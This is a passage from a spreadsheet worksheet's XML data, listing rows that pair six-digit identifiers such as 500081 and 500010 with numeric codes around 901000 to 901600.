        <v>500081</v>
      </c>
      <c r="B2452" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="2453" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2453" s="5">
        <v>500081</v>
      </c>
      <c r="B2453" s="3">
        <v>901547.00399999996</v>
      </c>
    </row>
    <row r="2454" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2454" s="5">
        <v>500081</v>
      </c>
      <c r="B2454" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="2455" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2455" s="5">
        <v>500081</v>
      </c>
      <c r="B2455" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="2456" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2456" s="5">
        <v>500081</v>
      </c>
      <c r="B2456" s="3">
        <v>901132.00100000005</v>
      </c>
    </row>
    <row r="2457" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2457" s="5">
        <v>500081</v>
      </c>
      <c r="B2457" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="2458" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2458" s="5">
        <v>500081</v>
      </c>
      <c r="B2458" s="3">
        <v>901573</v>
      </c>
    </row>
    <row r="2459" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2459" s="5">
        <v>500081</v>
      </c>
      <c r="B2459" s="3">
        <v>901573.00199999998</v>
      </c>
    </row>
    <row r="2460" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2460" s="5">
        <v>500081</v>
      </c>
      <c r="B2460" s="3">
        <v>901052.00100000005</v>
      </c>
    </row>
    <row r="2461" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2461" s="5">
        <v>500081</v>
      </c>
      <c r="B2461" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="2462" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2462" s="5">
        <v>500081</v>
      </c>
      <c r="B2462" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="2463" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2463" s="5">
        <v>500081</v>
      </c>
      <c r="B2463" s="3">
        <v>901564.00100000005</v>
      </c>
    </row>
    <row r="2464" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2464" s="5">
        <v>500081</v>
      </c>
      <c r="B2464" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="2465" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2465" s="5">
        <v>500081</v>
      </c>
      <c r="B2465" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="2466" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2466" s="5">
        <v>500081</v>
      </c>
      <c r="B2466" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2467" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2467" s="5">
        <v>500081</v>
      </c>
      <c r="B2467" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="2468" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2468" s="5">
        <v>500081</v>
      </c>
      <c r="B2468" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="2469" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2469" s="5">
        <v>500081</v>
      </c>
      <c r="B2469" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="2470" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2470" s="5">
        <v>500081</v>
      </c>
      <c r="B2470" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="2471" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2471" s="5">
        <v>500081</v>
      </c>
      <c r="B2471" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="2472" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2472" s="5">
        <v>500081</v>
      </c>
      <c r="B2472" s="3">
        <v>901027.00300000003</v>
      </c>
    </row>
    <row r="2473" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2473" s="5">
        <v>500081</v>
      </c>
      <c r="B2473" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="2474" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2474" s="5">
        <v>500081</v>
      </c>
      <c r="B2474" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="2475" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2475" s="5">
        <v>500081</v>
      </c>
      <c r="B2475" s="3">
        <v>901055.00100000005</v>
      </c>
    </row>
    <row r="2476" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2476" s="5">
        <v>500081</v>
      </c>
      <c r="B2476" s="3">
        <v>901091</v>
      </c>
    </row>
    <row r="2477" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2477" s="5">
        <v>500081</v>
      </c>
      <c r="B2477" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="2478" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2478" s="5">
        <v>500081</v>
      </c>
      <c r="B2478" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="2479" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2479" s="5">
        <v>500081</v>
      </c>
      <c r="B2479" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="2480" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2480" s="5">
        <v>500081</v>
      </c>
      <c r="B2480" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="2481" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2481" s="5">
        <v>500081</v>
      </c>
      <c r="B2481" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="2482" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2482" s="5">
        <v>500081</v>
      </c>
      <c r="B2482" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="2483" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2483" s="5">
        <v>500081</v>
      </c>
      <c r="B2483" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="2484" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2484" s="5">
        <v>500081</v>
      </c>
      <c r="B2484" s="3">
        <v>901221</v>
      </c>
    </row>
    <row r="2485" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2485" s="5">
        <v>500081</v>
      </c>
      <c r="B2485" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2486" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2486" s="5">
        <v>500081</v>
      </c>
      <c r="B2486" s="3">
        <v>901078.00300000003</v>
      </c>
    </row>
    <row r="2487" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2487" s="5">
        <v>500010</v>
      </c>
      <c r="B2487" s="3">
        <v>901134.00199999998</v>
      </c>
    </row>
    <row r="2488" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2488" s="5">
        <v>500010</v>
      </c>
      <c r="B2488" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="2489" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2489" s="5">
        <v>500010</v>
      </c>
      <c r="B2489" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="2490" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2490" s="5">
        <v>500010</v>
      </c>
      <c r="B2490" s="3">
        <v>901583.00600000005</v>
      </c>
    </row>
    <row r="2491" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2491" s="5">
        <v>500010</v>
      </c>
      <c r="B2491" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="2492" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2492" s="5">
        <v>500010</v>
      </c>
      <c r="B2492" s="3">
        <v>901071.00300000003</v>
      </c>
    </row>
    <row r="2493" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2493" s="5">
        <v>500010</v>
      </c>
      <c r="B2493" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="2494" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2494" s="5">
        <v>500010</v>
      </c>
      <c r="B2494" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="2495" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2495" s="5">
        <v>500010</v>
      </c>
      <c r="B2495" s="3">
        <v>901547.00399999996</v>
      </c>
    </row>
    <row r="2496" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2496" s="5">
        <v>500010</v>
      </c>
      <c r="B2496" s="3">
        <v>901110</v>
      </c>
    </row>
    <row r="2497" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2497" s="5">
        <v>500010</v>
      </c>
      <c r="B2497" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="2498" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2498" s="5">
        <v>500010</v>
      </c>
      <c r="B2498" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="2499" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2499" s="5">
        <v>500010</v>
      </c>
      <c r="B2499" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="2500" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2500" s="5">
        <v>500010</v>
      </c>
      <c r="B2500" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="2501" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2501" s="5">
        <v>500010</v>
      </c>
      <c r="B2501" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="2502" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2502" s="5">
        <v>500010</v>
      </c>
      <c r="B2502" s="3">
        <v>901584.00300000003</v>
      </c>
    </row>
    <row r="2503" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2503" s="5">
        <v>500010</v>
      </c>
      <c r="B2503" s="3">
        <v>901584.00399999996</v>
      </c>
    </row>
    <row r="2504" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2504" s="5">
        <v>500010</v>
      </c>
      <c r="B2504" s="3">
        <v>901584.00600000005</v>
      </c>
    </row>
    <row r="2505" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2505" s="5">
        <v>500010</v>
      </c>
      <c r="B2505" s="3">
        <v>901555.00399999996</v>
      </c>
    </row>
    <row r="2506" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2506" s="5">
        <v>500010</v>
      </c>
      <c r="B2506" s="3">
        <v>901213</v>
      </c>
    </row>
    <row r="2507" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2507" s="5">
        <v>500010</v>
      </c>
      <c r="B2507" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="2508" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2508" s="5">
        <v>500010</v>
      </c>
      <c r="B2508" s="3">
        <v>901025</v>
      </c>
    </row>
    <row r="2509" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2509" s="5">
        <v>500010</v>
      </c>
      <c r="B2509" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="2510" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2510" s="5">
        <v>500010</v>
      </c>
      <c r="B2510" s="3">
        <v>901587.00100000005</v>
      </c>
    </row>
    <row r="2511" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2511" s="5">
        <v>500010</v>
      </c>
      <c r="B2511" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="2512" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2512" s="5">
        <v>500010</v>
      </c>
      <c r="B2512" s="3">
        <v>901546.00300000003</v>
      </c>
    </row>
    <row r="2513" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2513" s="5">
        <v>500010</v>
      </c>
      <c r="B2513" s="3">
        <v>901546.01300000004</v>
      </c>
    </row>
    <row r="2514" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2514" s="5">
        <v>500010</v>
      </c>
      <c r="B2514" s="3">
        <v>901567.00199999998</v>
      </c>
    </row>
    <row r="2515" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2515" s="5">
        <v>500010</v>
      </c>
      <c r="B2515" s="3">
        <v>901068</v>
      </c>
    </row>
    <row r="2516" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2516" s="5">
        <v>500010</v>
      </c>
      <c r="B2516" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="2517" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2517" s="5">
        <v>500010</v>
      </c>
      <c r="B2517" s="3">
        <v>901615</v>
      </c>
    </row>
    <row r="2518" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2518" s="5">
        <v>500010</v>
      </c>
      <c r="B2518" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="2519" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2519" s="5">
        <v>500010</v>
      </c>
      <c r="B2519" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2520" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2520" s="5">
        <v>500010</v>
      </c>
      <c r="B2520" s="3">
        <v>901570</v>
      </c>
    </row>
    <row r="2521" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2521" s="5">
        <v>500010</v>
      </c>
      <c r="B2521" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="2522" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2522" s="5">
        <v>500010</v>
      </c>
      <c r="B2522" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="2523" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2523" s="5">
        <v>500010</v>
      </c>
      <c r="B2523" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="2524" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2524" s="5">
        <v>500010</v>
      </c>
      <c r="B2524" s="3">
        <v>901027.005</v>
      </c>
    </row>
    <row r="2525" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2525" s="5">
        <v>500010</v>
      </c>
      <c r="B2525" s="3">
        <v>901588.00100000005</v>
      </c>
    </row>
    <row r="2526" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2526" s="5">
        <v>500010</v>
      </c>
      <c r="B2526" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="2527" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2527" s="5">
        <v>500010</v>
      </c>
      <c r="B2527" s="3">
        <v>901201</v>
      </c>
    </row>
    <row r="2528" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2528" s="5">
        <v>500010</v>
      </c>
      <c r="B2528" s="3">
        <v>901120</v>
      </c>
    </row>
    <row r="2529" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2529" s="5">
        <v>500010</v>
      </c>
      <c r="B2529" s="3">
        <v>901069.00100000005</v>
      </c>
    </row>
    <row r="2530" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2530" s="5">
        <v>500010</v>
      </c>
      <c r="B2530" s="3">
        <v>901069.00199999998</v>
      </c>
    </row>
    <row r="2531" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2531" s="5">
        <v>500010</v>
      </c>
      <c r="B2531" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="2532" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2532" s="5">
        <v>500010</v>
      </c>
      <c r="B2532" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="2533" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2533" s="5">
        <v>500010</v>
      </c>
      <c r="B2533" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="2534" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2534" s="5">
        <v>500010</v>
      </c>
      <c r="B2534" s="3">
        <v>901055.00100000005</v>
      </c>
    </row>
    <row r="2535" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2535" s="5">
        <v>500010</v>
      </c>
      <c r="B2535" s="3">
        <v>901090</v>
      </c>
    </row>
    <row r="2536" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2536" s="5">
        <v>500010</v>
      </c>
      <c r="B2536" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="2537" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2537" s="5">
        <v>500010</v>
      </c>
      <c r="B2537" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="2538" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2538" s="5">
        <v>500010</v>
      </c>
      <c r="B2538" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="2539" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2539" s="5">
        <v>500010</v>
      </c>
      <c r="B2539" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="2540" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2540" s="5">
        <v>500010</v>
      </c>
      <c r="B2540" s="3">
        <v>901553.00600000005</v>
      </c>
    </row>
    <row r="2541" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2541" s="5">
        <v>500010</v>
      </c>
      <c r="B2541" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="2542" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2542" s="5">
        <v>500010</v>
      </c>
      <c r="B2542" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="2543" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2543" s="5">
        <v>500010</v>
      </c>
      <c r="B2543" s="3">
        <v>901016.00100000005</v>
      </c>
    </row>
    <row r="2544" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2544" s="5">
        <v>500010</v>
      </c>
      <c r="B2544" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="2545" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2545" s="5">
        <v>500010</v>
      </c>
      <c r="B2545" s="3">
        <v>901007</v>
      </c>
    </row>
    <row r="2546" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2546" s="5">
        <v>500010</v>
      </c>
      <c r="B2546" s="3">
        <v>901124</v>
      </c>
    </row>
    <row r="2547" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2547" s="5">
        <v>500010</v>
      </c>
      <c r="B2547" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="2548" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2548" s="5">
        <v>500010</v>
      </c>
      <c r="B2548" s="3">
        <v>901078.00300000003</v>
      </c>
    </row>
    <row r="2549" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2549" s="5">
        <v>500010</v>
      </c>
      <c r="B2549" s="3">
        <v>901102</v>
      </c>
    </row>
    <row r="2550" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2550" s="5">
        <v>500010</v>
      </c>
      <c r="B2550" s="3">
        <v>901102.00199999998</v>
      </c>
    </row>
    <row r="2551" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2551" s="5">
        <v>500123</v>
      </c>
      <c r="B2551" s="3">
        <v>901595.00199999998</v>
      </c>
    </row>
    <row r="2552" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2552" s="5">
        <v>500123</v>
      </c>
      <c r="B2552" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="2553" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2553" s="5">
        <v>500123</v>
      </c>
      <c r="B2553" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2554" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2554" s="5">
        <v>500123</v>
      </c>
      <c r="B2554" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="2555" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2555" s="5">
        <v>500107</v>
      </c>
      <c r="B2555" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="2556" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2556" s="5">
        <v>500107</v>
      </c>
      <c r="B2556" s="3">
        <v>901068</v>
      </c>
    </row>
    <row r="2557" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2557" s="5">
        <v>500107</v>
      </c>
      <c r="B2557" s="3">
        <v>901574.00100000005</v>
      </c>
    </row>
    <row r="2558" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2558" s="5">
        <v>500107</v>
      </c>
      <c r="B2558" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2559" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2559" s="5">
        <v>500107</v>
      </c>
      <c r="B2559" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="2560" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2560" s="5">
        <v>500107</v>
      </c>
      <c r="B2560" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="2561" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2561" s="5">
        <v>500107</v>
      </c>
      <c r="B2561" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="2562" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2562" s="5">
        <v>500107</v>
      </c>
      <c r="B2562" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="2563" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2563" s="5">
        <v>500107</v>
      </c>
      <c r="B2563" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2564" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2564" s="5">
        <v>500124</v>
      </c>
      <c r="B2564" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="2565" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2565" s="5">
        <v>500124</v>
      </c>
      <c r="B2565" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="2566" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2566" s="5">
        <v>500124</v>
      </c>
      <c r="B2566" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="2567" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2567" s="5">
        <v>500124</v>
      </c>
      <c r="B2567" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="2568" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2568" s="5">
        <v>500124</v>
      </c>
      <c r="B2568" s="3">
        <v>901090</v>
      </c>
    </row>
    <row r="2569" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2569" s="5">
        <v>500124</v>
      </c>
      <c r="B2569" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="2570" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2570" s="5">
        <v>500124</v>
      </c>
      <c r="B2570" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="2571" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2571" s="5">
        <v>500112</v>
      </c>
      <c r="B2571" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="2572" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2572" s="5">
        <v>500112</v>
      </c>
      <c r="B2572" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="2573" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2573" s="5">
        <v>500112</v>
      </c>
      <c r="B2573" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="2574" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2574" s="5">
        <v>500112</v>
      </c>
      <c r="B2574" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="2575" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2575" s="5">
        <v>500112</v>
      </c>
      <c r="B2575" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="2576" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2576" s="5">
        <v>500112</v>
      </c>
      <c r="B2576" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="2577" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2577" s="5">
        <v>500112</v>
      </c>
      <c r="B2577" s="3">
        <v>901036.00100000005</v>
      </c>
    </row>
    <row r="2578" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2578" s="5">
        <v>500112</v>
      </c>
      <c r="B2578" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="2579" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2579" s="5">
        <v>500112</v>
      </c>
      <c r="B2579" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="2580" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2580" s="5">
        <v>500112</v>
      </c>
      <c r="B2580" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="2581" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2581" s="5">
        <v>500112</v>
      </c>
      <c r="B2581" s="3">
        <v>901566.00300000003</v>
      </c>
    </row>
    <row r="2582" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2582" s="5">
        <v>500112</v>
      </c>
      <c r="B2582" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="2583" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2583" s="5">
        <v>500112</v>
      </c>
      <c r="B2583" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="2584" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2584" s="5">
        <v>500112</v>
      </c>
      <c r="B2584" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="2585" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2585" s="5">
        <v>500112</v>
      </c>
      <c r="B2585" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="2586" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2586" s="5">
        <v>500112</v>
      </c>
      <c r="B2586" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="2587" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2587" s="5">
        <v>500112</v>
      </c>
      <c r="B2587" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="2588" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2588" s="5">
        <v>500112</v>
      </c>
      <c r="B2588" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="2589" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2589" s="5">
        <v>500112</v>
      </c>
      <c r="B2589" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="2590" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2590" s="5">
        <v>500112</v>
      </c>
      <c r="B2590" s="3">
        <v>901432</v>
      </c>
    </row>
    <row r="2591" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2591" s="5">
        <v>500112</v>
      </c>
      <c r="B2591" s="3">
        <v>901429</v>
      </c>
    </row>
    <row r="2592" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2592" s="5">
        <v>500112</v>
      </c>
      <c r="B2592" s="3">
        <v>901512</v>
      </c>
    </row>
    <row r="2593" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2593" s="5">
        <v>500112</v>
      </c>
      <c r="B2593" s="3">
        <v>901412</v>
      </c>
    </row>
    <row r="2594" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2594" s="5">
        <v>500112</v>
      </c>
      <c r="B2594" s="3">
        <v>901533</v>
      </c>
    </row>
    <row r="2595" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2595" s="5">
        <v>500112</v>
      </c>
      <c r="B2595" s="3">
        <v>901475</v>
      </c>
    </row>
    <row r="2596" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2596" s="5">
        <v>500112</v>
      </c>
      <c r="B2596" s="3">
        <v>901476</v>
      </c>
    </row>
    <row r="2597" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2597" s="5">
        <v>500112</v>
      </c>
      <c r="B2597" s="3">
        <v>901407</v>
      </c>
    </row>
    <row r="2598" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2598" s="5">
        <v>500112</v>
      </c>
      <c r="B2598" s="3">
        <v>901523</v>
      </c>
    </row>
    <row r="2599" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2599" s="5">
        <v>500112</v>
      </c>
      <c r="B2599" s="3">
        <v>901420</v>
      </c>
    </row>
    <row r="2600" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2600" s="5">
        <v>500112</v>
      </c>
      <c r="B2600" s="3">
        <v>901581</v>
      </c>
    </row>
    <row r="2601" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2601" s="5">
        <v>500112</v>
      </c>
      <c r="B2601" s="3">
        <v>901417</v>
      </c>
    </row>
    <row r="2602" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2602" s="5">
        <v>500112</v>
      </c>
      <c r="B2602" s="3">
        <v>901478</v>
      </c>
    </row>
    <row r="2603" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2603" s="5">
        <v>500112</v>
      </c>
      <c r="B2603" s="3">
        <v>901430</v>
      </c>
    </row>
    <row r="2604" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2604" s="5">
        <v>500112</v>
      </c>
      <c r="B2604" s="3">
        <v>901406</v>
      </c>
    </row>
    <row r="2605" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2605" s="5">
        <v>500112</v>
      </c>
      <c r="B2605" s="3">
        <v>901521</v>
      </c>
    </row>
    <row r="2606" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2606" s="5">
        <v>500112</v>
      </c>
      <c r="B2606" s="3">
        <v>901426</v>
      </c>
    </row>
    <row r="2607" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2607" s="5">
        <v>500044</v>
      </c>
      <c r="B2607" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="2608" spans="1:2" x14ac:dyDescent="0.25">
